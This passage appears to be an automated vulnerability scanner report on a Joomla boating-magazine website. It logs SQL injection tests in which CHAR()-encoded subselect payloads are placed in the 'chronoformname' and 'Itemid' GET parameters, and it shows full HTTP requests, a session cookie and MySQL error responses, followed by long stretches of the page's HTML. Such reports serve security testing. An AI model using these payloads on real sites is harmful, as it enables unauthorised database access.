href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN..
- /component/chronocontact/

/component/chronocontact/

http://www.soundingsonline.com/component/chronocontact/?chronoformname='%2B%20(select+convert(int,CH..

Parameters

Parameter Type Value
chronoformname GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /component/chronocontact/?chronoformname='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/chronocontact/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Online</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_uncategorized"><!--
Type of page: <br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li&g..
- /index.php

/index.php

http://www.soundingsonline.com/index.php?option=com_chronocontact&chronoformname='%2B%20(select+conv..

Parameters

Parameter Type Value
option GET com_chronocontact
chronoformname GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /index.php?option=com_chronocontact&chronoformname='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:32:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:32:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/index.php" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Online</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_uncategorized"><!--
Type of page: <br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class=..
- /index.php

/index.php

http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid='..

Parameters

Parameter Type Value
option GET com_content
view GET category
layout GET blog
id GET 98
Itemid GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
